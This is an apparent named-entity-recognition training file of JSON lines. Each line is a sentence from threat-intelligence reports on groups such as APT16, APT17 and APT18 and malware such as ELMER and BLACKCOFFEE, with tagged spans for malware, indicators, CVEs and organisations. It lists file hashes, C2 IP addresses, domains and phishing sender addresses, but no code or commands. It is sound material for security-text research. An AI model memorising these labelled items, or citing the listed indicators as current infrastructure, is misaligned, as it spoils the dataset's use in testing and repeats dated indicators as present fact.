{"text": "Cybercriminals are constantly evolving and adapting in their attempts to bypass computer network defenses .", "spans": {}, "info": {"id": "aptner_train_002209", "source": "aptner_train"}}
{"text": "But , larger , more successful threat actors tend to evolve at a slower rate .", "spans": {}, "info": {"id": "aptner_train_002210", "source": "aptner_train"}}
{"text": "As long as these actors regularly achieve their objective ( stealing sensitive data ) , they are not motivated to update or rethink their techniques , tactics , or procedures ( TTPs ) .", "spans": {}, "info": {"id": "aptner_train_002211", "source": "aptner_train"}}
{"text": "These threat actors ’ tactics follow the same principles of evolution – successful techniques propagate , and unsuccessful ones are abandoned .", "spans": {}, "info": {"id": "aptner_train_002212", "source": "aptner_train"}}
{"text": "Attackers do not change their approach unless an external force or environmental shift compels them to .", "spans": {}, "info": {"id": "aptner_train_002213", "source": "aptner_train"}}
{"text": "As the old saying goes : If it ain’t broke , don’t fix it .", "spans": {}, "info": {"id": "aptner_train_002214", "source": "aptner_train"}}
{"text": "So when a larger , successful threat actor changes up tactics , the move always piques our attention .", "spans": {}, "info": {"id": "aptner_train_002215", "source": "aptner_train"}}
{"text": "Naturally , our first priority is ensuring that we detect the new or altered TTPs .", "spans": {}, "info": {"id": "aptner_train_002216", "source": "aptner_train"}}
{"text": "But we also attempt to figure out why the adversary changed — what broke? — so that we can predict if and when they will change again in the future .", "spans": {}, "info": {"id": "aptner_train_002217", "source": "aptner_train"}}
{"text": "We observed an example of this phenomenon around May .", "spans": {}, "info": {"id": "aptner_train_002218", "source": "aptner_train"}}
{"text": "The previous versions of Aumlib had not changed since at least May 2011, and Ixeshe had not evolved since at least December 2011 .", "spans": {"Malware: Aumlib": [[25, 31]]}, "info": {"id": "aptner_train_002220", "source": "aptner_train"}}
{"text": "We cannot say for sure whether the attackers were responding to the scrutiny they received in the wake of the episode .", "spans": {}, "info": {"id": "aptner_train_002221", "source": "aptner_train"}}
{"text": "But we do know the change was sudden .", "spans": {}, "info": {"id": "aptner_train_002222", "source": "aptner_train"}}
{"text": "Akin to turning a battleship , retooling TTPs of large threat actors is formidable .", "spans": {}, "info": {"id": "aptner_train_002223", "source": "aptner_train"}}
{"text": "Such a move requires recoding malware , updating infrastructure , and possibly retraining workers on new processes .", "spans": {}, "info": {"id": "aptner_train_002224", "source": "aptner_train"}}
{"text": "The following sections detail the changes to Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe .", "spans": {"Indicator: Backdoor.APT.Aumlib": [[45, 64]], "Indicator: Backdoor.APT.Ixeshe": [[69, 88]]}, "info": {"id": "aptner_train_002225", "source": "aptner_train"}}
{"text": "Backdoor.APT.Aumlib :", "spans": {"Indicator: Backdoor.APT.Aumlib": [[0, 19]]}, "info": {"id": "aptner_train_002226", "source": "aptner_train"}}
{"text": "A recently observed malware sample ( hash value 832f5e01be536da71d5b3f7e41938cfb ) appears to be a modified variant of Aumlib .", "spans": {"Indicator: 832f5e01be536da71d5b3f7e41938cfb": [[48, 80]], "Malware: Aumlib": [[119, 125]]}, "info": {"id": "aptner_train_002227", "source": "aptner_train"}}
{"text": "The sample , which was deployed against an organization involved in shaping economic policy , was downloaded from the following URL :", "spans": {}, "info": {"id": "aptner_train_002228", "source": "aptner_train"}}
{"text": "status.acmetoy.com /DD/ myScript.js or status.acmetoy.com /DD/ css.css .", "spans": {"Indicator: status.acmetoy.com": [[0, 18], [39, 57]], "Indicator: myScript.js": [[24, 35]], "Indicator: css.css": [[63, 70]]}, "info": {"id": "aptner_train_002229", "source": "aptner_train"}}
{"text": "This output reveals the following changes when compared with earlier variants :", "spans": {}, "info": {"id": "aptner_train_002230", "source": "aptner_train"}}
{"text": "The POST URI is changed to /bbs/ search.asp ( as mentioned , earlier Aumlib variants used a POST URI of /bbs/ info.asp . ) The POST body is now encoded .", "spans": {"Indicator: search.asp": [[33, 43]], "Malware: Aumlib": [[69, 75]], "Indicator: info.asp": [[110, 118]]}, "info": {"id": "aptner_train_002231", "source": "aptner_train"}}
{"text": "These subtle changes may be enough to circumvent existing IDS signatures designed to detect older variants of the Aumlib family .", "spans": {"Malware: Aumlib": [[114, 120]]}, "info": {"id": "aptner_train_002232", "source": "aptner_train"}}
{"text": "The sample 832f5e01be536da71d5b3f7e41938cfb shares code with an older Aumlib variant with the hash cb3dcde34fd9ff0e19381d99b02f9692 .", "spans": {"Indicator: 832f5e01be536da71d5b3f7e41938cfb": [[11, 43]], "Malware: Aumlib": [[70, 76]], "Indicator: cb3dcde34fd9ff0e19381d99b02f9692": [[99, 131]]}, "info": {"id": "aptner_train_002233", "source": "aptner_train"}}
{"text": "The sample cb3dcde34fd9ff0e19381d99b02f9692 connected to documents.myPicture.info and www.documents.myPicture.info and as expected generated the a POST request to /bbs/ info.asp .", "spans": {"Indicator: cb3dcde34fd9ff0e19381d99b02f9692": [[11, 43]], "Indicator: documents.myPicture.info": [[57, 81]], "Indicator: www.documents.myPicture.info": [[86, 114]], "Indicator: info.asp": [[169, 177]]}, "info": {"id": "aptner_train_002234", "source": "aptner_train"}}
{"text": "Backdoor.APT.Ixeshe :", "spans": {"Indicator: Backdoor.APT.Ixeshe": [[0, 19]]}, "info": {"id": "aptner_train_002235", "source": "aptner_train"}}
{"text": "Ixeshe has been used in targeted attacks since 2009, often against entities in East Asia .", "spans": {"Malware: Ixeshe": [[0, 6]]}, "info": {"id": "aptner_train_002236", "source": "aptner_train"}}
{"text": "The network traffic is encoded with a custom Base64 alphabet .", "spans": {}, "info": {"id": "aptner_train_002237", "source": "aptner_train"}}
{"text": "We analyzed a recent sample that appears to have targeted entities in Taiwan , a target consistent with previous Ixeshe activity .", "spans": {"Malware: Ixeshe": [[113, 119]]}, "info": {"id": "aptner_train_002238", "source": "aptner_train"}}
{"text": "This sample ( aa873ed803ca800ce92a39d9a683c644 ) exhibited network traffic that does not match the earlier pattern and therefore may evade existing network traffic signatures designed to detect Ixeshe related infections .", "spans": {"Indicator: aa873ed803ca800ce92a39d9a683c644": [[14, 46]], "Malware: Ixeshe": [[194, 200]]}, "info": {"id": "aptner_train_002239", "source": "aptner_train"}}
{"text": "APT16 .", "spans": {"Organization: APT16": [[0, 5]]}, "info": {"id": "aptner_train_002240", "source": "aptner_train"}}
{"text": "Between November 26, 2015, and December 1, 2015, known and suspected China based APT groups launched several spear phishing attacks targeting Japanese and Taiwanese organizations in the high-tech , government services , media and financial services industries .", "spans": {}, "info": {"id": "aptner_train_002241", "source": "aptner_train"}}
{"text": "Each campaign delivered a malicious Microsoft Word document exploiting the aforementioned EPS dict copy use-after-free vulnerability , and the local Windows privilege escalation vulnerability CVE-2015-1701 .", "spans": {"Organization: Microsoft": [[36, 45]], "System: Word": [[46, 50]], "System: EPS": [[90, 93]], "System: Windows": [[149, 156]], "Vulnerability: CVE-2015-1701": [[192, 205]]}, "info": {"id": "aptner_train_002242", "source": "aptner_train"}}
{"text": "The successful exploitation of both vulnerabilities led to the delivery of either a downloader that we refer to as IRONHALO , or a backdoor that we refer to as ELMER .", "spans": {"Malware: IRONHALO": [[115, 123]], "Malware: ELMER": [[160, 165]]}, "info": {"id": "aptner_train_002243", "source": "aptner_train"}}
{"text": "On November 26, 2015, a suspected China based APT group sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies .", "spans": {"System: emails": [[107, 113]]}, "info": {"id": "aptner_train_002244", "source": "aptner_train"}}
{"text": "As shown in Figure 1, the emails originated from the Yahoo ! email address mts03282000@yahoo.co.jp , and contained the subject “ Sending of New Year No .", "spans": {"System: emails": [[26, 32]], "Organization: Yahoo": [[53, 58]], "System: email": [[61, 66]], "Indicator: mts03282000@yahoo.co.jp": [[75, 98]]}, "info": {"id": "aptner_train_002245", "source": "aptner_train"}}
{"text": "Foreword ” .", "spans": {}, "info": {"id": "aptner_train_002246", "source": "aptner_train"}}
{"text": "Each phishing message contained the same malicious Microsoft Word attachment .", "spans": {"Organization: Microsoft": [[51, 60]], "System: Word": [[61, 65]]}, "info": {"id": "aptner_train_002247", "source": "aptner_train"}}
{"text": "The malicious attachment resembled an article hosted on a legitimate Japanese defense-related website , as both discussed national defense topics and carried the same byline .", "spans": {}, "info": {"id": "aptner_train_002248", "source": "aptner_train"}}
{"text": "The lure documents also used the Japanese calendar , as indicated by the 27th year in the Heisei period .", "spans": {}, "info": {"id": "aptner_train_002249", "source": "aptner_train"}}
{"text": "This demonstrates that the threat actors understand conventional Japanese date notation .", "spans": {}, "info": {"id": "aptner_train_002250", "source": "aptner_train"}}
{"text": "Following the exploitation of the EPS and CVE-2015-1701 vulnerabilities , the exploit payload drops either a 32-bit or 64-bit binary containing an embedded IRONHALO malware sample .", "spans": {"System: EPS": [[34, 37]], "Vulnerability: CVE-2015-1701": [[42, 55]], "Malware: IRONHALO": [[156, 164]]}, "info": {"id": "aptner_train_002251", "source": "aptner_train"}}
{"text": "The encoded payload is written to a temporary file , decoded and executed in a hidden window .", "spans": {}, "info": {"id": "aptner_train_002253", "source": "aptner_train"}}
{"text": "The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively , where [%rand%] is a 4-byte hexadecimal number based on the current timestamp .", "spans": {"Indicator: igfxHK[%rand%].dat": [[60, 78]], "Indicator: igfxHK[%rand%].exe": [[83, 101]]}, "info": {"id": "aptner_train_002254", "source": "aptner_train"}}
{"text": "IRONHALO : AcroRd32Info.exe.exe a8ccb2fc5fec1b89f778d93096f8dd65 .", "spans": {"Malware: IRONHALO": [[0, 8]], "Indicator: AcroRd32Info.exe.exe": [[11, 31]], "Indicator: a8ccb2fc5fec1b89f778d93096f8dd65": [[32, 64]]}, "info": {"id": "aptner_train_002255", "source": "aptner_train"}}
{"text": "IRONHALO persists by copying itself to the current user ’s Startup folder .", "spans": {"Malware: IRONHALO": [[0, 8]], "System: Startup": [[59, 66]]}, "info": {"id": "aptner_train_002256", "source": "aptner_train"}}
{"text": "This variant sends an HTTP request to a legitimate Japanese website using a malformed User-Agent string , as shown in Figure 2 .", "spans": {"System: User-Agent": [[86, 96]]}, "info": {"id": "aptner_train_002257", "source": "aptner_train"}}
{"text": "The threat actors likely compromised the legitimate site and attempted to use it as a staging server for second-stage payloads .", "spans": {}, "info": {"id": "aptner_train_002258", "source": "aptner_train"}}
{"text": "On December 1, 2015, threat actors launched two additional spear phishing attacks exploiting the undisclosed EPS vulnerability and CVE-2015-1701 .", "spans": {"System: EPS": [[109, 112]], "Vulnerability: CVE-2015-1701": [[131, 144]]}, "info": {"id": "aptner_train_002259", "source": "aptner_train"}}
{"text": "Unlike the Nov. 26 campaign , these attacks targeted Taiwanese governmental and media and entertainment organizations .", "spans": {}, "info": {"id": "aptner_train_002260", "source": "aptner_train"}}
{"text": "Moreover , the exploit dropped a different malware payload , a backdoor we refer to as ELMER .", "spans": {"Malware: ELMER": [[87, 92]]}, "info": {"id": "aptner_train_002261", "source": "aptner_train"}}
{"text": "The first spear phishing message was sent to a Taiwanese governmental employee on Dec. 1 .", "spans": {}, "info": {"id": "aptner_train_002262", "source": "aptner_train"}}
{"text": "The attachment was created using the traditional Chinese character set , and contained a flowchart that appeared to be taken from the legitimate Taiwanese government auction website http://shwoo.gov.taipei/buyer_flowchart.asp .", "spans": {"Organization: Taiwanese government": [[145, 165]], "Indicator: http://shwoo.gov.taipei/buyer_flowchart.asp": [[182, 225]]}, "info": {"id": "aptner_train_002263", "source": "aptner_train"}}
{"text": "The second December spear phishing attack targeted Taiwan based news media organizations .", "spans": {}, "info": {"id": "aptner_train_002264", "source": "aptner_train"}}
{"text": "The emails originated from the address dpptccb.dpp@msa.hinet.net , and contained the subject DPP's Contact Information Update .", "spans": {"System: emails": [[4, 10]], "Indicator: dpptccb.dpp@msa.hinet.net": [[39, 64]]}, "info": {"id": "aptner_train_002265", "source": "aptner_train"}}
{"text": "Based on the email address naming convention and message subject , the threat actors may have tried to make the message appear to be a legitimate communication from the Democratic Progressive Party ( DPP ) , Taiwan ’s opposition party .", "spans": {"System: email": [[13, 18]]}, "info": {"id": "aptner_train_002266", "source": "aptner_train"}}
{"text": "Unlike the previous exploit documents , this malicious attachment did not contain any visible text when opened in Microsoft Word .", "spans": {"Organization: Microsoft": [[114, 123]], "System: Word": [[124, 128]]}, "info": {"id": "aptner_train_002267", "source": "aptner_train"}}
{"text": "The exploit documents delivered during the December campaigns dropped a binary containing an embedded variant of a backdoor we refer to as ELMER .", "spans": {"Malware: ELMER": [[139, 144]]}, "info": {"id": "aptner_train_002268", "source": "aptner_train"}}
{"text": "ELMER is a non-persistent proxy-aware HTTP backdoor written in Delphi , and is capable of performing file uploads and downloads , file execution , and process and directory listings .", "spans": {"Malware: ELMER": [[0, 5]], "System: Delphi": [[63, 69]]}, "info": {"id": "aptner_train_002269", "source": "aptner_train"}}
{"text": "To retrieve commands , ELMER sends HTTP GET requests to a hard-coded C2 server , and parses the HTTP response packets received from the C2 server for an integer string corresponding to the command that needs to be executed .", "spans": {"Malware: ELMER": [[23, 28]], "System: C2": [[69, 71], [136, 138]]}, "info": {"id": "aptner_train_002270", "source": "aptner_train"}}
{"text": "Table 2 lists the ELMER backdoors observed during the December campaigns .", "spans": {"Malware: ELMER backdoors": [[18, 33]]}, "info": {"id": "aptner_train_002271", "source": "aptner_train"}}
{"text": "The ELMER variant 6c33223db475f072119fe51a2437a542 beaconed to the C2 IP address 121.127.249.74 over port 443 .", "spans": {"Malware: ELMER": [[4, 9]], "Indicator: 6c33223db475f072119fe51a2437a542": [[18, 50]], "System: C2": [[67, 69]], "Indicator: 121.127.249.74": [[81, 95]]}, "info": {"id": "aptner_train_002272", "source": "aptner_train"}}
{"text": "APT16 .", "spans": {"Organization: APT16": [[0, 5]]}, "info": {"id": "aptner_train_002273", "source": "aptner_train"}}
{"text": "This is based on the use of the known APT16 domain rinpocheinfo.com , as well as overlaps in previously observed targeting and tactics , techniques and procedures ( TTPs ) .", "spans": {"Organization: APT16": [[38, 43]], "Indicator: rinpocheinfo.com": [[51, 67]]}, "info": {"id": "aptner_train_002275", "source": "aptner_train"}}
{"text": "Taiwanese citizens will go to the polls on January 16 , 2016 , to choose a new President and legislators .", "spans": {}, "info": {"id": "aptner_train_002276", "source": "aptner_train"}}
{"text": "According to recent opinion polls , the Democratic Progressive Party ( DPP ) candidate Tsai Ing-wen is leading her opponents and is widely expected to win the election .", "spans": {"Organization: Democratic Progressive Party": [[40, 68]], "Organization: DPP": [[71, 74]]}, "info": {"id": "aptner_train_002277", "source": "aptner_train"}}
{"text": "The DPP is part of the pan-green coalition that favors Taiwanese independence over reunification with the mainland , and the party ’s victory would represent a shift away from the ruling Kuomintang ’s closer ties with the PRC .", "spans": {"Organization: PRC": [[222, 225]]}, "info": {"id": "aptner_train_002278", "source": "aptner_train"}}
{"text": "Since 1949 , Beijing has claimed Taiwan as a part of China and strongly opposes any action toward independence .", "spans": {}, "info": {"id": "aptner_train_002279", "source": "aptner_train"}}
{"text": "The Chinese government is therefore concerned whether a DPP victory might weaken the commercial and tourism ties between China and Taiwan , or even drive Taiwan closer to independence .", "spans": {"Organization: Chinese government": [[4, 22]], "Organization: DPP": [[56, 59]]}, "info": {"id": "aptner_train_002280", "source": "aptner_train"}}
{"text": "In 2005 , the Chinese government passed an “ anti-secession ” law that signified its intention to use “ non-peaceful ” means to stymie any Taiwanese attempt to secede from China .", "spans": {"Organization: Chinese government": [[14, 32]]}, "info": {"id": "aptner_train_002281", "source": "aptner_train"}}
{"text": "APT16 actors sent spear phishing emails to two Taiwanese media organization addresses and three webmail addresses .", "spans": {"Organization: APT16": [[0, 5]], "System: emails": [[33, 39]]}, "info": {"id": "aptner_train_002282", "source": "aptner_train"}}
{"text": "The message subject read “ DPP ’s Contact Information Update ” , apparently targeting those interested in contact information for DPP members or politicians .", "spans": {"Organization: DPP": [[27, 30], [130, 133]]}, "info": {"id": "aptner_train_002283", "source": "aptner_train"}}
{"text": "The Chinese government would benefit from improved insight into local media coverage of Taiwanese politics , both to better anticipate the election outcome and to gather additional intelligence on politicians , activists , and others who interact with journalists .", "spans": {"Organization: Chinese government": [[4, 22]]}, "info": {"id": "aptner_train_002284", "source": "aptner_train"}}
{"text": "This tactic is not without precedent ; in 2013 , the New York Times revealed it had been the target of China based actors shortly after it reported on the alleged mass accumulation of wealth by then-Prime Minister Wen Jiabao and his family .", "spans": {"Organization: New York Times": [[53, 67]]}, "info": {"id": "aptner_train_002285", "source": "aptner_train"}}
{"text": "The actors likely sought information on the newspaper ’s sources in China , who could be silenced by the government .", "spans": {}, "info": {"id": "aptner_train_002286", "source": "aptner_train"}}
{"text": "Compromising these Taiwanese news organizations would also allow the actors to gain access to informants or other protected sources , who might then be targeted for further intelligence collection or even retribution .", "spans": {}, "info": {"id": "aptner_train_002287", "source": "aptner_train"}}
{"text": "The webmail addresses , while unknown , were possibly the personal-use addresses of the individuals whose corporate domain emails were targeted .", "spans": {"System: emails": [[123, 129]]}, "info": {"id": "aptner_train_002288", "source": "aptner_train"}}
{"text": "As corporate networks become more secure and users become more vigilant , personal accounts can still offer a means to bypass security systems .", "spans": {}, "info": {"id": "aptner_train_002289", "source": "aptner_train"}}
{"text": "This tactic exploits users ’ reduced vigilance when reading their own personal email , even when using corporate IT equipment to do so .", "spans": {"System: email": [[79, 84]]}, "info": {"id": "aptner_train_002290", "source": "aptner_train"}}
{"text": "One of the media organizations involved in this latest activity was targeted in June 2015 , while its Hong Kong branch was similarly targeted in August 2015 .", "spans": {}, "info": {"id": "aptner_train_002293", "source": "aptner_train"}}
{"text": "APT16 actors were likely also responsible for the June 2015 activity .", "spans": {"Organization: APT16": [[0, 5]]}, "info": {"id": "aptner_train_002294", "source": "aptner_train"}}
{"text": "They sent spear phishing messages with the subject “ 2015 Taiwan Security and Cultural Forum Invitation Form ” , and used a different tool – a tool that we refer to as DOORJAMB – in their attempt to compromise the organization .", "spans": {"Malware: DOORJAMB": [[168, 176]]}, "info": {"id": "aptner_train_002295", "source": "aptner_train"}}
{"text": "A different group , known as admin@338 , used LOWBALL malware during its Hong Kong activity .", "spans": {"Indicator: admin@338": [[29, 38]], "Malware: LOWBALL": [[46, 53]]}, "info": {"id": "aptner_train_002296", "source": "aptner_train"}}
{"text": "Despite the differing sponsorship , penetration of Hong Kong and Taiwan based media organizations continues to be a priority for China based threat groups .", "spans": {}, "info": {"id": "aptner_train_002297", "source": "aptner_train"}}
{"text": "The difference in sponsorship could be the result of tasking systems that allocate targeting responsibility to different groups based on their targets ’ geographic location .", "spans": {}, "info": {"id": "aptner_train_002298", "source": "aptner_train"}}
{"text": "In other words , while media organizations are important targets , it is possible that two separate groups are responsible for Hong Kong and Taiwan , respectively .", "spans": {}, "info": {"id": "aptner_train_002299", "source": "aptner_train"}}
{"text": "IRONHALO : CVE-2015-1701 .", "spans": {"Malware: IRONHALO": [[0, 8]], "Vulnerability: CVE-2015-1701": [[11, 24]]}, "info": {"id": "aptner_train_002301", "source": "aptner_train"}}
{"text": "ELMER : CVE-2015-1701 .", "spans": {"Malware: ELMER": [[0, 5]], "Vulnerability: CVE-2015-1701": [[8, 21]]}, "info": {"id": "aptner_train_002302", "source": "aptner_train"}}
{"text": "These clusters of activity raise interesting questions about the use of an identical silently-patched vulnerability , possibly by multiple threat groups .", "spans": {}, "info": {"id": "aptner_train_002303", "source": "aptner_train"}}
{"text": "Both Japan and Taiwan are important intelligence collection targets for China , particularly because of recent changes to Japan ’s pacifist constitution and the upcoming Taiwanese election .", "spans": {}, "info": {"id": "aptner_train_002304", "source": "aptner_train"}}
{"text": "Based on our visibility and available data , we only attribute one campaign to the Chinese APT group APT16 .", "spans": {"Organization: APT16": [[101, 106]]}, "info": {"id": "aptner_train_002305", "source": "aptner_train"}}
{"text": "APT17 .", "spans": {"Organization: APT17": [[0, 5]]}, "info": {"id": "aptner_train_002306", "source": "aptner_train"}}
{"text": "FireEye Threat Intelligence and the Microsoft Threat Intelligence Center investigated a command-and-control ( C2 ) obfuscation tactic used on Microsoft ’s TechNet , a web portal for IT professionals .", "spans": {"Organization: FireEye": [[0, 7]], "Organization: Microsoft": [[36, 45], [142, 151]], "System: command-and-control": [[88, 107]], "System: C2": [[110, 112]], "System: TechNet": [[155, 162]]}, "info": {"id": "aptner_train_002307", "source": "aptner_train"}}
{"text": "TechNet ’s security was in no way compromised by this tactic , which is likely possible on other message boards and forums .", "spans": {"System: TechNet": [[0, 7]]}, "info": {"id": "aptner_train_002308", "source": "aptner_train"}}
{"text": "FireEye Threat Intelligence assesses that APT17 , a China based threat group , was behind the attempt .", "spans": {"Organization: FireEye": [[0, 7]], "Organization: APT17": [[42, 47]]}, "info": {"id": "aptner_train_002309", "source": "aptner_train"}}
{"text": "Other groups have used legitimate websites to host C2 IP address in the past .", "spans": {"System: C2": [[51, 53]]}, "info": {"id": "aptner_train_002310", "source": "aptner_train"}}
{"text": "APT17 was embedding the encoded C2 IP address for the BLACKCOFFEE malware in legitimate Microsoft TechNet profiles pages and forum threads , a method some in the information security community call a “ dead drop resolver. ” Encoding the IP address makes it more difficult to identify the true C2 address for network security professionals .", "spans": {"Organization: APT17": [[0, 5]], "System: C2": [[32, 34], [293, 295]], "Malware: BLACKCOFFEE": [[54, 65]], "Organization: Microsoft": [[88, 97]], "System: TechNet": [[98, 105]]}, "info": {"id": "aptner_train_002311", "source": "aptner_train"}}
{"text": "Few security companies have publicly discussed this tactic .", "spans": {}, "info": {"id": "aptner_train_002312", "source": "aptner_train"}}
{"text": "After discovering the BLACKCOFFEE activity , the FireEye-Microsoft team encoded a sinkhole IP address into the profile pages and forum threads and locked the accounts to prevent the threat actors from making any changes .", "spans": {"Malware: BLACKCOFFEE": [[22, 33]], "Organization: FireEye-Microsoft": [[49, 66]]}, "info": {"id": "aptner_train_002313", "source": "aptner_train"}}
{"text": "This collaborative approach allowed the team to observe the malware and its victims .", "spans": {}, "info": {"id": "aptner_train_002314", "source": "aptner_train"}}
{"text": "Though the security community has not yet broadly discussed this technique , FireEye has observed other threat groups adopting these measures and expect this trend to continue on other community sites .", "spans": {"Organization: FireEye": [[77, 84]]}, "info": {"id": "aptner_train_002315", "source": "aptner_train"}}
{"text": "Today , FireEye released Indicators of Compromise ( IOCs ) for BLACKCOFFEE and Microsoft released signatures for its anti-malware products .", "spans": {"Organization: FireEye": [[8, 15]], "Malware: BLACKCOFFEE": [[63, 74]], "Organization: Microsoft": [[79, 88]]}, "info": {"id": "aptner_train_002316", "source": "aptner_train"}}
{"text": "APT17 , also known as DeputyDog , is a Chinabased threat group that FireEye Intelligence has observed conducting network intrusions against U.S. government entities , the defense industry , law firms , information technology companies , mining companies , and non-government organizations .", "spans": {"Organization: APT17": [[0, 5]], "Organization: DeputyDog": [[22, 31]], "Organization: FireEye": [[68, 75]]}, "info": {"id": "aptner_train_002317", "source": "aptner_train"}}
{"text": "BLACKCOFFEE ’s functionality includes uploading and downloading files ; creating a reverse shell ; enumerating files and processes ; renaming , moving , and deleting files ; terminating processes ; and expanding its functionality by adding new backdoor commands .", "spans": {"Malware: BLACKCOFFEE": [[0, 11]]}, "info": {"id": "aptner_train_002318", "source": "aptner_train"}}
{"text": "FireEye has monitored APT17 ’s use of BLACKCOFFEE variants since 2013 to masquerade malicious communication as normal web traffic by disguising the C2 communication as queries to web search engines .", "spans": {"Organization: FireEye": [[0, 7]], "Organization: APT17": [[22, 27]], "Malware: BLACKCOFFEE": [[38, 49]], "System: C2": [[148, 150]]}, "info": {"id": "aptner_train_002319", "source": "aptner_train"}}
{"text": "The use of BLACKCOFFEE demonstrates threat actors ’ evolving use of public websites to hide in plain sight .", "spans": {"Malware: BLACKCOFFEE": [[11, 22]]}, "info": {"id": "aptner_train_002320", "source": "aptner_train"}}
{"text": "In the past , threat actors would modify easily compromised websites to host C2 commands and configuration , as observed in the China based APT1 ’s WEBC2 suite of backdoors .", "spans": {"System: C2": [[77, 79]], "Organization: APT1": [[140, 144]], "Malware: WEBC2": [[148, 153]]}, "info": {"id": "aptner_train_002321", "source": "aptner_train"}}
{"text": "Now , threat actors are using well-known websites—that they do not need to compromise to host C2 IP addresses .", "spans": {"System: C2": [[94, 96]]}, "info": {"id": "aptner_train_002322", "source": "aptner_train"}}
{"text": "They simply use the website for legitimate purposes , such as posting forum threads or creating profile pages .", "spans": {}, "info": {"id": "aptner_train_002323", "source": "aptner_train"}}
{"text": "APT17 went further to obfuscate their C2 IP address and employed a multi-layered approach for the malware to finally beacon the true C2 IP .", "spans": {"Organization: APT17": [[0, 5]], "System: C2": [[38, 40], [133, 135]]}, "info": {"id": "aptner_train_002324", "source": "aptner_train"}}
{"text": "They used legitimate infrastructure—the ability to post or create comments on forums and profile pages—to embed a string that the malware would decode to find and communicate with the true C2 IP address .", "spans": {"System: C2": [[189, 191]]}, "info": {"id": "aptner_train_002325", "source": "aptner_train"}}
{"text": "This additional obfuscation puts yet another layer between APT17 and the security professionals attempting to chase them down .", "spans": {"Organization: APT17": [[59, 64]]}, "info": {"id": "aptner_train_002326", "source": "aptner_train"}}
{"text": "This BLACKCOFFEE variant contains one or more URLs that link to the biography sections of attacker-created profiles as well as forum threads that contain comments from those same profiles .", "spans": {"Malware: BLACKCOFFEE": [[5, 16]]}, "info": {"id": "aptner_train_002327", "source": "aptner_train"}}
{"text": "A URL is randomly selected and the malware searches at that location for an encoded IP address located between two tags , “ @MICR0S0FT ” and “ C0RP0RATI0N ” .", "spans": {}, "info": {"id": "aptner_train_002328", "source": "aptner_train"}}
{"text": "The malware then communicates directly with the retrieved and decoded IP address to receive commands and send stolen information .", "spans": {}, "info": {"id": "aptner_train_002329", "source": "aptner_train"}}
{"text": "If the C2 server is discovered or shut down , the threat actors can update the encoded IP address on TechNet to maintain control of the victims ’ machines .", "spans": {"System: C2": [[7, 9]], "System: TechNet": [[101, 108]]}, "info": {"id": "aptner_train_002330", "source": "aptner_train"}}
{"text": "BLACKCOFFEE supports an initial set of fifteen commands , including creating a reverse shell , uploading and downloading files , and enumerating files and processes .", "spans": {"Malware: BLACKCOFFEE": [[0, 11]]}, "info": {"id": "aptner_train_002331", "source": "aptner_train"}}
{"text": "The attackers can also extend BLACKCOFFEE ’s functionality through additional commands sent as shellcode .", "spans": {"Malware: BLACKCOFFEE": [[30, 41]]}, "info": {"id": "aptner_train_002332", "source": "aptner_train"}}
{"text": "APT17 : de56eb5046e518e266e67585afa34612 .", "spans": {"Organization: APT17": [[0, 5]], "Indicator: de56eb5046e518e266e67585afa34612": [[8, 40]]}, "info": {"id": "aptner_train_002333", "source": "aptner_train"}}
{"text": "APT17 : 195ade342a6a4ea0a58cfbfb43dc64cb .", "spans": {"Organization: APT17": [[0, 5]], "Indicator: 195ade342a6a4ea0a58cfbfb43dc64cb": [[8, 40]]}, "info": {"id": "aptner_train_002334", "source": "aptner_train"}}
{"text": "APT17 : 4c21336dad66ebed2f7ee45d41e6cada .", "spans": {"Organization: APT17": [[0, 5]], "Indicator: 4c21336dad66ebed2f7ee45d41e6cada": [[8, 40]]}, "info": {"id": "aptner_train_002335", "source": "aptner_train"}}
{"text": "APT17 : 0370002227619c205402c48bde4332f6 .", "spans": {"Organization: APT17": [[0, 5]], "Indicator: 0370002227619c205402c48bde4332f6": [[8, 40]]}, "info": {"id": "aptner_train_002336", "source": "aptner_train"}}
{"text": "APT17 : ac169b7d4708c6fa7fee9be5f7576414 .", "spans": {"Organization: APT17": [[0, 5]], "Indicator: ac169b7d4708c6fa7fee9be5f7576414": [[8, 40]]}, "info": {"id": "aptner_train_002337", "source": "aptner_train"}}
{"text": "APT17 : 130.184.156.62 .", "spans": {"Organization: APT17": [[0, 5]], "Indicator: 130.184.156.62": [[8, 22]]}, "info": {"id": "aptner_train_002338", "source": "aptner_train"}}
{"text": "APT17 : 69.80.72.165 .", "spans": {"Organization: APT17": [[0, 5]], "Indicator: 69.80.72.165": [[8, 20]]}, "info": {"id": "aptner_train_002339", "source": "aptner_train"}}
{"text": "APT17 : 110.45.151.43 .", "spans": {"Organization: APT17": [[0, 5]], "Indicator: 110.45.151.43": [[8, 21]]}, "info": {"id": "aptner_train_002340", "source": "aptner_train"}}
{"text": "APT17 : 121.101.73.231 .", "spans": {"Organization: APT17": [[0, 5]], "Indicator: 121.101.73.231": [[8, 22]]}, "info": {"id": "aptner_train_002341", "source": "aptner_train"}}
{"text": "APT18 .", "spans": {"Organization: APT18": [[0, 5]]}, "info": {"id": "aptner_train_002342", "source": "aptner_train"}}
{"text": "Dell SecureWorks Counter Threat Unit ( CTU ) analysts were recently engaged with a client thought to have been compromised by a threat group CTU researchers have named Threat Group-0416 ( TG-0416 ) .", "spans": {"Organization: Dell SecureWorks Counter Threat Unit": [[0, 36]], "Organization: CTU": [[39, 42], [141, 144]], "Organization: Threat Group-0416": [[168, 185]], "Organization: TG-0416": [[188, 195]]}, "info": {"id": "aptner_train_002343", "source": "aptner_train"}}
{"text": "Various artifacts from the initial phases of the incident provided strong indications of the existence of this particular threat group within the client's infrastructure .", "spans": {}, "info": {"id": "aptner_train_002344", "source": "aptner_train"}}
{"text": "The threat actors achieved an initial foothold into the infrastructure via phishing email that convinced victims to install the Xyligan remote access Trojan ( RAT ) on a system .", "spans": {"System: phishing email": [[75, 89]], "Malware: Xyligan": [[128, 135]], "Malware: Trojan": [[150, 156]]}, "info": {"id": "aptner_train_002346", "source": "aptner_train"}}
{"text": "The threat actors then installed the hcdLoader RAT , which installs as a Windows service and provides command line access to the compromised system .", "spans": {"Malware: hcdLoader": [[37, 46]], "System: Windows": [[73, 80]]}, "info": {"id": "aptner_train_002347", "source": "aptner_train"}}
